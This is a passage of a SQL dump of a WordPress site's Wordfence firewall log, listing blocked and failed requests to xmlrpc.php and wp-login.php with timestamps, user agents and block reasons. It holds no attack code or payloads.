Network',NULL),(9974,0.000000,1630640846.597793,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9975,0.000000,1630641375.076719,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9976,0.000000,1630641896.578013,'\0\0\0\0\0\0\0\0\0\0��-O�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9977,0.000000,1630641900.311143,'\0\0\0\0\0\0\0\0\0\0��#��8',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9978,0.000000,1630642098.325399,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9979,0.000000,1630642389.088637,'\0\0\0\0\0\0\0\0\0\0��+�Ԟ',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9980,0.000000,1630642421.561862,'\0\0\0\0\0\0\0\0\0\0����C',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9981,0.000000,1630642900.569271,'\0\0\0\0\0\0\0\0\0\0���zɁ',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9982,0.000000,1630642929.704676,'\0\0\0\0\0\0\0\0\0\0��Uy\\',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9983,0.000000,1630642937.138346,'\0\0\0\0\0\0\0\0\0\0��\rJ��',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9984,0.000000,1630643465.443423,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9985,0.000000,1630643465.501438,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9986,0.000000,1630643964.767139,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9987,0.000000,1630643978.899564,'\0\0\0\0\0\0\0\0\0\0��{+�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9988,0.000000,1630644321.161980,'\0\0\0\0\0\0\0\0\0\0��j4��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9989,0.000000,1630644488.356882,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9990,0.000000,1630644997.730447,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9991,0.000000,1630645002.517560,'\0\0\0\0\0\0\0\0\0\0���zR',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9992,0.000000,1630645121.427456,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9993,0.000000,1630646516.826948,'\0\0\0\0\0\0\0\0\0\0����G�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9994,0.000000,1630647314.642678,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9995,0.000000,1630648708.843562,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9996,0.000000,1630649516.591852,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9997,0.000000,1630650873.342678,'\0\0\0\0\0\0\0\0\0\0��M+В',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9998,0.000000,1630650875.915951,'\0\0\0\0\0\0\0\0\0\0��M+В',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9999,0.000000,1630650876.850672,'\0\0\0\0\0\0\0\0\0\0��M+В',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10000,0.000000,1630650877.912678,'\0\0\0\0\0\0\0\0\0\0��M+В',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10001,0.000000,1630650878.923433,'\0\0\0\0\0\0\0\0\0\0��M+В',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10002,0.000000,1630650880.060269,'\0\0\0\0\0\0\0\0\0\0��M+В',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10003,0.000000,1630650885.141234,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10004,0.000000,1630650893.079060,'\0\0\0\0\0\0\0\0\0\0��U�P#',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10005,0.000000,1630650899.129008,'\0\0\0\0\0\0\0\0\0\0����d�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10006,0.000000,1630650904.004109,'\0\0\0\0\0\0\0\0\0\0����d',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(10007,0.000000,1630650906.922578,'\0\0\0\0\0\0\0\0\0\0����d�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10008,1630650908.766141,1630650908.686900,'\0\0\0\0\0\0\0\0\0\0����d�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(10009,0.000000,1630650924.214965,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10010,0.000000,1630651210.076347,'\0\0\0\0\0\0\0\0\0\0���A�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10011,0.000000,1630651738.958737,'\0\0\0\0\0\0\0\0\0\0��a��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10012,0.000000,1630653121.387620,'\0\0\0\0\0\0\0\0\0\0��>�zJ',0,503,0,0,0,'https://www.dogstardesign.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10013,0.000000,1630653160.175662,'\0\0\0\0\0\0\0\0\0\0���(%�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10014,0.000000,1630653979.824611,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10015,0.000000,1630654379.913166,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10016,0.000000,1630655414.987270,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10017,0.000000,1630656236.596326,'\0\0\0\0\0\0\0\0\0\0��_��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10018,0.000000,1630658026.892866,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10019,0.000000,1630658433.560257,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10020,0.000000,1630658847.005220,'\0\0\0\0\0\0\0\0\0\0���W��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10021,0.000000,1630659281.936009,'\0\0\0\0\0\0\0\0\0\0���R-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10022,0.000000,1630659709.135945,'\0\0\0\0\0\0\0\0\0\0��=C�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10023,0.000000,1630659928.723966,'\0\0\0\0\0\0\0\0\0\0���#�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10024,0.000000,1630660145.808141,'\0\0\0\0\0\0\0\0\0\0��ca�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10025,0.000000,1630660604.911794,'\0\0\0\0\0\0\0\0\0\0��\'ji&',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10026,0.000000,1630660757.202154,'\0\0\0\0\0\0\0\0\0\0���=��',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10027,0.000000,1630661068.426778,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10028,0.000000,1630661534.204920,'\0\0\0\0\0\0\0\0\0\0��ca�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10029,0.000000,1630662449.931002,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10030,0.000000,1630662886.997297,'\0\0\0\0\0\0\0\0\0\0��Bt�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10031,0.000000,1630662887.580588,'\0\0\0\0\0\0\0\0\0\0���_�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10032,0.000000,1630663160.073165,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10033,0.000000,1630663319.009502,'\0\0\0\0\0\0\0\0\0\0��Ϛԛ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10034,0.000000,1630663801.889533,'\0\0\0\0\0\0\0\0\0\0��X�%1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10035,0.000000,1630664248.545529,'\0\0\0\0\0\0\0\0\0\0���8\Z�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10036,0.000000,1630664691.982138,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10037,0.000000,1630664846.028858,'\0\0\0\0\0\0\0\0\0\0���^�M',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10038,0.000000,1630665623.532306,'\0\0\0\0\0\0\0\0\0\0��ν��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10039,0.000000,1630665751.398642,'\0\0\0\0\0\0\0\0\0\0��C��T',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10040,0.000000,1630665816.377458,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10041,0.000000,1630666205.051159,'\0\0\0\0\0\0\0\0\0\0���@r',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10042,0.000000,1630666668.400579,'\0\0\0\0\0\0\0\0\0\0���]��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10043,0.000000,1630667115.274363,'\0\0\0\0\0\0\0\0\0\0��R�71',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10044,0.000000,1630667447.054122,'\0\0\0\0\0\0\0\0\0\0��R�,�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10045,0.000000,1630667589.911094,'\0\0\0\0\0\0\0\0\0\0��X�%1',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10046,0.000000,1630668017.531532,'\0\0\0\0\0\0\0\0\0\0��1���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10047,0.000000,1630668489.071143,'\0\0\0\0\0\0\0\0\0\0���VE3',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10048,0.000000,1630668958.882500,'\0\0\0\0\0\0\0\0\0\0���\r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10049,0.000000,1630669401.253078,'\0\0\0\0\0\0\0\0\0\0��go(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10050,0.000000,1630669842.720442,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10051,0.000000,1630670021.264164,'\0\0\0\0\0\0\0\0\0\0�����q',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10052,0.000000,1630670314.874983,'\0\0\0\0\0\0\0\0\0\0��]r��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10053,0.000000,1630670765.645049,'\0\0\0\0\0\0\0\0\0\0���G�%',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10054,0.000000,1630670938.924453,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10055,0.000000,1630671250.537835,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10056,0.000000,1630671728.019279,'\0\0\0\0\0\0\0\0\0\0���ࣶ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10057,0.000000,1630672188.934016,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10058,0.000000,1630672656.184564,'\0\0\0\0\0\0\0\0\0\0���zaD',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10059,0.000000,1630673110.307489,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10060,0.000000,1630673600.788940,'\0\0\0\0\0\0\0\0\0\0��]r��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10061,0.000000,1630674040.767285,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10062,0.000000,1630674507.084843,'\0\0\0\0\0\0\0\0\0\0��\"}6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10063,0.000000,1630674658.434206,'\0\0\0\0\0\0\0\0\0\0��g|\\�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security 